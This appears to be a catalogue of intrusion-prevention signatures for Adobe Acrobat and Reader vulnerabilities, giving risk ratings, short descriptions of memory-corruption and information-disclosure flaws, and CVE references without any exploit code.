Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-buttonGetIcon-Use-After-Free

About this vulnerability: A vulnerability in Adobe Acrobat
Risk: High
First detected in: sgpkg-ips-1388-5242
Last changed: sgpkg-ips-1388-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: A use after free vulnerability has been reported in Adobe Acrobat and Acrobat Reader DC. The vulnerability is due to improper handling of button form fields in calls to the buttonGetIcon method. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PDF file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-buttonGetIcon-Use-After-Free
References:
CVE-2021-39836
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39836
Back to top

Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Deleteitemat-Use-After-Free

About this vulnerability: A vulnerability in Adobe Acrobat
Risk: High
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1392-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: Two use after free vulnerabilities, CVE-2021-39839 and CVE-2021-39837, have been reported in Adobe Acrobat and Acrobat Reader DC. The vulnerabilities are due to improper handling of list box form fields in calls to the deleteItemAt and getItemAt methods. A remote attacker can exploit these vulnerabilities by enticing a target user into opening a crafted PDF file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Deleteitemat-Use-After-Free
References:
CVE-2021-39837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39837
Back to top

Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Field-Format-Action-Use-After-Free

About this vulnerability: A vulnerability in Adobe Acrobat
Risk: High
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: A use after free vulnerability has been reported in Adobe Acrobat and Acrobat Reader DC. The vulnerability is due to improper handling of form fields during the execution of field format actions. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PDF file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Field-Format-Action-Use-After-Free
References:
CVE-2021-39840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39840
Back to top

Adobe-Acrobat-And-Acrobat-Reader-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat DC
Risk: Moderate
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: There exists a heap-based buffer overflow vulnerability in Adobe Acrobat and Acrobat Reader. Successful exploitation could lead in arbitrary code execution.
Situation: File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Heap-Buffer-Overflow
References:
CVE-2021-21017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017
Back to top

Adobe-Acrobat-And-Acrobat-Reader-Information-Disclosure

About this vulnerability: A vulnerability in Adobe Acrobat DC
Risk: Moderate
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Adobe Acrobat and Acrobat Reader. The vulnerability is due to a lack of user confirmation before performing DNS lookups when certain JavaScript functions are invoked. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PDF document. Successful exploitation results in a DNS lookup for an attacker controlled domain, disclosing that the PDF has been opened, closed, or some other action has been taken.
Situation: File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Information-Disclosure
References:
CVE-2020-29075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29075
Back to top

Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow

About this vulnerability: An integer overflow vulnerability in Adobe Acrobat and Adobe Reader products
Risk: High
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Adobe Acrobat; Adobe Reader
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Adobe Acrobat and Adobe Reader products. A remote attacker can exploit this vulnerability by enticing a target user to open malformed PDF files.
Situation: E-Mail_BS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow-2
HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
File-PDF_Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
File-PDF_Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow-2
References:
CVE-2009-3459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3459
BID-36600
http://www.securityfocus.com/bid/36600
OSVDB-58729
http://www.osvdb.org/58729
Back to top

Adobe-Acrobat-And-Adobe-Reader-Plugin-Object-Reloading-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in the Adobe PDF plugin for Firefox web browser
Risk: High
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: There is a memory corruption vulnerability in the Adobe PDF plugin for the Firefox web browser. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page in a Firefox web browser that has the vulnerable plugin installed. Successful exploitation causes a memory corruption that may lead to arbitrary code execution with the privileges of the logged in user, or terminate the application abnormally.
Situation: HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Plugin-Object-Reloading-Memory-Corruption
File-Text_Adobe-Acrobat-And-Reader-Plugin-Object-Reloading-Memory-Corruption
References:
CVE-2009-2983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2983
BID-36668
http://www.securityfocus.com/bid/36668
OSVDB-58913
http://www.osvdb.org/58913
Back to top

Adobe-Acrobat-And-Adobe-Reader-U3D-Rhadobemeta-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat Professional
Risk: Moderate
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Adobe Reader and Acrobat. The vulnerability is due to the way of Adobe Acrobat and Adobe Reader handle U3D data. A remote attacker can exploit this vulnerability by enticing the target user to open malicious PDF files. In an attack case where code injection is not successful, the affected Acrobat application parsing the malicious PDF document can terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user.
Situation: File-PDF_Adobe-Acrobat-And-Adobe-Reader-U3D-Rhadobemeta-Buffer-Overflow
References:
CVE-2009-1855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1855
BID-35282
http://www.securityfocus.com/bid/35282
Back to top

Adobe-Acrobat-And-Reader-Acroform-Encoding-Code-Execution

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Input Validation
Description: Improper parsing of PDF elements causes a code execution vulnerability in Adobe Acrobat.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Acroform-Encoding-Code-Execution
References:
CVE-2017-11263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11263
Back to top

Adobe-Acrobat-And-Reader-Acroform-Font-Encoding-Code-Execution

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Input Validation
Description: Improper handling of an encoding dictionary in a PDF file causes a vulnerability in Adobe Acrobat. A successful exploitation allows an attacker to execute arbitrary code with the privileges of the affected process.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Acroform-Font-Encoding-Code-Execution
References:
CVE-2017-16415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16415
Back to top

Adobe-Acrobat-And-Reader-Acroform-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2015
Risk: Moderate
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Incorrect string handling causes a use after free vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to execute arbitrary code in with the privileges of the affected process.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Acroform-Use-After-Free
References:
CVE-2020-3805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3805
Back to top

Adobe-Acrobat-And-Reader-Addannot-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: A user after free vulnerability in Adobe Systems Acrobat 2017 allows a remote attacker to execute arbitrary code on the target system by means of a crafted document file.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Addannot-Use-After-Free
References:
CVE-2017-11254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11254
Back to top

Adobe-Acrobat-And-Reader-Dc-Acroform-Buttongetcaption-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017 (Classic)
Risk: Moderate
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper handling of button form fields in calls to the buttonGetCaption method causes a use after free vulnerability in Adobe Acrobat. A successful exploit allows an attacker to execute code with the privileges of the target process.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Dc-Acroform-Buttongetcaption-Use-After-Free
References:
CVE-2021-39838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39838
Back to top

Adobe-Acrobat-And-Reader-Docid-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1049-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: There has been reported a stack buffer overflow vulnerability in Adobe Acrobat and Acrobat Reader. This vulnerability could be exploited by having a target user open a crafted webpage or a maliciously crafted document.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Docid-Stack-Buffer-Overflow
References:
CVE-2018-4901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4901
Back to top

Adobe-Acrobat-And-Reader-Escript-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2015
Risk: Moderate
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper string handling causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to gain access to sensitive information on the target system.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Escript-Out-Of-Bounds-Read
References:
CVE-2020-3804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3804
Back to top

Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Integer Overflow
Description: A code execution vulnerability exists in Adobe Acrobat and Reader.
Situation: HTTP_SS-Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow
File-PDF_Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow
References:
CVE-2010-2862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2862
BID-42203
http://www.securityfocus.com/bid/42203
Back to top

Adobe-Acrobat-And-Reader-Form-Field-Format-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat
Risk: Moderate
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: An use-after-free vulnerability has been reported in Adobe Acrobat and Acrobat Reader. This vulnerability is due to incorrect handling of Format event actions attached to form fields. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted web page or document. Successful exploitation of this vulnerability could lead to arbitrary code execution under the security context of the user.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Form-Field-Format-Use-After-Free
References:
CVE-2020-24437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24437
Back to top

Adobe-Acrobat-And-Reader-JavaScript-Field-Name-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2015
Risk: Moderate
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Input Validation
Description: Improper handling of JavaScript operations causes an out of bounds read vulnerability in Adobe Acrobat and related software. A successful exploit may lead to information disclosure.
Situation: File-PDF_Adobe-Acrobat-JavaScript-Field-Name-Out-Of-Bounds-Read
References:
CVE-2020-3744
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3744
Back to top

Adobe-Acrobat-And-Reader-Jpeg2000-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat DC (Classic)
Risk: Moderate
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: There exists an out-of-bounds read vulnerability in Adobe Acrobat and Reader. A remote attacker can use this to gain sensitive information.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Out-Of-Bounds-Read
References:
CVE-2017-2946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2946
Back to top

Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: There has been reported a vulnerability in the JPEG2000 component of Adobe Acrobat and Acrobat Reader. This vulnerability could be exploited by a remote attacker, if a target user open a maliciously crafted webpage or a maliciously crafted PDF document. Successful exploitation could result in information disclosure.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read
References:
CVE-2017-16374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16374
Back to top

Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-15953

About this vulnerability: A vulnerability in Adobe Acrobat and Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Input Validation
Description: An out of bounds read vulnerability has been reported in the JPEG2000 component of Adobe Acrobat and Acrobat Reader. The vulnerability is due to improper processing of embedded JPEG2000 images in PDF files. A remote attacker could exploit the vulnerability by enticing a user to open a maliciously crafted webpage or a maliciously crafted PDF document. Successful exploitation could result in information disclosure which could be used to further compromise the target system.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-15953
References:
CVE-2018-15953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15953
Back to top

Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4949

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1073-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper processing of JPEG2000 files in PDFs causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may lead to information to be disclosed to a remote attacker.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4949
References:
CVE-2018-4949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4949
Back to top

Adobe-Acrobat-And-Reader-PDF-Gotoe-Information-Disclosure

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Input Validation
Description: An incomplete fix for CVE-2018-4993, which improperly validates GoToE actions in a PDF document, causes a vulnerability in Adobe Acrobat. A successful exploit allows an attacker to leak NTLM hashes from the target.
Situation: File-PDF_Adobe-Acrobat-Gotoe-Information-Disclosure
References:
CVE-2018-15979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15979
Back to top

Adobe-Acrobat-And-Reader-PDF-XML-Stylesheet-Information-Disclosure

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Input Validation
Description: A lack of input validation for remote XML style sheet URLs causes an information disclosure vulnerability in Adobe Acrobat. A sucessful exploit may allow an attacker to gain access to NTLM hashes on the target system.
Situation: File-PDF_Adobe-Acrobat-And-Reader-PDF-XML-Stylesheet-Information-Disclosure
References:
CVE-2019-7089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7089
Back to top

Adobe-Acrobat-And-Reader-Remote-Code-Execution

About this vulnerability: A vulnerability in Adobe Acrobat and Reader
Risk: High
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat;Adobe Reader
Type: Input Validation
Description: A vulnerability in Adobe Acrobat and Adobe Reader, multiple versions, which allows remote attackers to execute arbitrary code by sending a target user a maliciously crafted PDF document, due to the improper handling of the Text field value.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Remote-Code-Execution
References:
CVE-2019-7125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7125
Back to top

Adobe-Acrobat-And-Reader-U3D-Uninitialized-Variable

About this vulnerability: A vulnerability in Adobe Acrobat and Reader
Risk: High
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1332-5242
Platform: Generic
Software: Adobe Acrobat;Adobe Reader
Type: Malfunction
Description: There exists a vulberability in Adobe Acrobat and Adobe Reader, versions 10.1.1 and prior, 9.4.6 and prior, which allows remote attackers to execute arbitrary code due to a flaw in the code that handles U3D files embedded in PDF files.
Situation: File-PDF_Adobe-Acrobat-And-Reader-U3D-Uninitialized-Variable
References:
CVE-2011-2462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2462
Back to top

Adobe-Acrobat-And-Reader-Xfa-Oneofchild-Remote-Code-Execution

About this vulnerability: A vulnerability in Adobe Systems Acrobat
Risk: Moderate
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: A remote code execution vulnerability exists in Adobe Acrobat and Reader. The vulnerability is due to an error when dealing with oneOfChild property of an XFA element enclosed in a PDF file. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted document. A successful attack could result in the execution of arbitrary code in the security context of the target user. Note: This vulnerability is currently being exploited.
Situation: File-PDF_Adobe-Acrobat-And-Reader-Xfa-Oneofchild-Remote-Code-Execution
References:
CVE-2013-0640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0640
BID-57931
http://www.securityfocus.com/bid/57931
OSVDB-90169
http://www.osvdb.org/90169
Back to top

Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Acrobat
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in both Adobe Acrobat and Reader. The vulnerability is due to a stack-based buffer overflow error within the CoolType.dll module when handling PDF files containing OpenType or TrueType fonts. Remote attackers could exploit this vulnerability by enticing target users to open a malicious PDF document. Successful exploitation would result in arbitrary code execution in the context of the logged on user.
Situation: HTTP_SS-Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
HTTP_SS-Adobe-Acrobat-Cooltype-Sing-Buffer-Overflow
File-PDF_Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
File-PDF_Adobe-Acrobat-Cooltype-Sing-Buffer-Overflow
References:
CVE-2010-2883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883
BID-43057
http://www.securityfocus.com/bid/43057
Back to top

Adobe-Acrobat-Dc-Smask-Image-Xobject-Height-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Adobe Systems Acrobat Pro DC
Risk: Moderate
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Platform: Generic
Software: Adobe Acrobat
Type: Integer Overflow
Description: An image object with a negative dimension was detected in a PDF. Such objects can be used to trigger vulnerabilities that result from improper handling of invalid data.
Situation: File-PDF_Negative-Image-Dimension
References:
CVE-2021-39843
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39843
Back to top

Adobe-Acrobat-EMF-Emfplusdrawlines-Count-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1086-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Buffer Overflow
Description: Improper parsing of EmfPlusDrawLines records in an EMF file causes a heap buffer overflow vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to run arbitrary code on the target system with the privileges of the Acrobat process.
Situation: File-Binary_Adobe-Acrobat-EMF-Emfplusdrawlines-Count-Heap-Buffer-Overflow
References:
CVE-2018-5067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5067
Back to top

Adobe-Acrobat-File-Extension-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: A vulnerability exists in Adobe Acrobat's handling of a document's file name extension. When Acrobat opens a file with an overly long file name extension, a buffer overflow occurs. An attacker could use this vulnerability to remotely execute code on a system. In a simple attack scenario, upon opening a document file with an overly long extension, the Adobe Acrobat application will terminate. In a more complicated attack scenario, an attacker could craft a file extension with shell code embedded in it, in which case the behaviour of the target machine would depend entirely on the injected shell code.
Situation: HTTP_SHS-Adobe-Acrobat-File-Extension-Buffer-Overflow
References:
CVE-2004-0632
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0632
Back to top

Adobe-Acrobat-File-Information-Disclosure

About this vulnerability: File information disclosure vulnerability in Adobe Acrobat
Risk: Moderate
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: Adobe Acrobat installs an ActiveX component that can be explicitly invoked in web pages. It is possible to create a HTML page that uses this component to retrieve information about the existence of files on the host viewing the web page.
Situation: HTTP_Adobe-Acrobat-File-Information-Disclosure
File-Text_Adobe-Acrobat-File-Information-Disclosure
References:
CVE-2005-0035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0035
BID-12989
http://www.securityfocus.com/bid/12989
OSVDB-15242
http://www.osvdb.org/15242
Back to top

Adobe-Acrobat-Flatedecode-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Acrobat
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Integer Overflow
Description: There is an integer overflow vulnerability in the Adobe Acrobat and Reader applications. The vulnerability is due to the way these applications process FlateDecode filter parameters. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious PDF file. In an attack where code injection is not successful, the affected application may terminate abnormally. In an attack where code injection is successful, the behavior of the target host depends on the intended function of the injected code. The injected code is executed in the security context of the currently logged in user.
Situation: HTTP_SS-Adobe-Acrobat-Flatedecode-Integer-Overflow
File-PDF_Adobe-Acrobat-Flatedecode-Integer-Overflow
References:
CVE-2009-1856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1856
BID-35294
http://www.securityfocus.com/bid/35294
Back to top

Adobe-Acrobat-Imageconversion-EMF-BMP-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Buffer Overflow
Description: Improper parsing of BMP data in an EMF file causes a heap buffer overflow vulnerability the ImageConversion component of Adobe Acrobat. A successful exploit allows an attacker to run arbitrary code on the target system.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-BMP-Heap-Buffer-Overflow
References:
CVE-2018-4982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4982
Back to top

Adobe-Acrobat-Imageconversion-EMF-BMP-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: There has been reported an out of bounds vulnerability in Adobe Acrobat. Successful exploitation might lead to information disclosure.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-BMP-Out-Of-Bounds-Read
References:
CVE-2017-16407
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16407
Back to top

Adobe-Acrobat-Imageconversion-EMF-Emfplus-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Buffer Overflow
Description: There has been reported a heap-based buffer overflow vulnerability in the ImageConversion component of Adobe Acrobat. This vulnerability can be exploited, if a target user opens a crafted EMF document provided by a remote attacker. Successful exploitation could result in arbitrary code execution.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfplus-Heap-Based-Buffer-Overflow
References:
CVE-2017-16416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16416
Back to top

Adobe-Acrobat-Imageconversion-EMF-Emfplusdrawbeziers-Type-Confusion

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: High
First detected in: sgpkg-ips-1136-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: A type confusion vulnerability has been reported in the ImageConversion component of Adobe Acrobat. The vulnerability is due to improper parsing of an object pointed by ObjectID of an EmfPlusDrawBeziers record. A remote attacker could exploit this vulnerability by enticing a target user into opening a crafted EMF document. Successful exploitation could result in arbitrary code execution under the security context of the user.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfplusdrawbeziers-Type-Confusion
References:
CVE-2018-4949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4949
Back to top

Adobe-Acrobat-Imageconversion-EMF-Emfpluspath-Object-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1081-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Buffer Overflow
Description: Improper parsing of an EmfPlusPath Object data within an EMF file causes a heap buffer overflow in Adobe Acrobat. A successfule exploit allows arbitrary code execution under the security context of the user.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfpluspath-Object-Heap-Buffer-Overflow
References:
CVE-2018-4978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4978
Back to top

Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchblt-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper parsing of the EMR_STRETCHBLT record in an EMF file causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may lead to information disclosure.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchblt-Out-Of-Bounds-Read
References:
CVE-2018-4886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4886
Back to top

Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchdibits-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Buffer Overflow
Description: Improper parsing of EMR_STRETCHDIBITS data within an EMF file causes a buffer overflow vulnerability in Adobe Acrobat. A successful exploit allows arbitrary code to be executed with the privileges of the Acrobat process.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchdibits-Heap-Based-Buffer-Overflow
References:
CVE-2017-16397
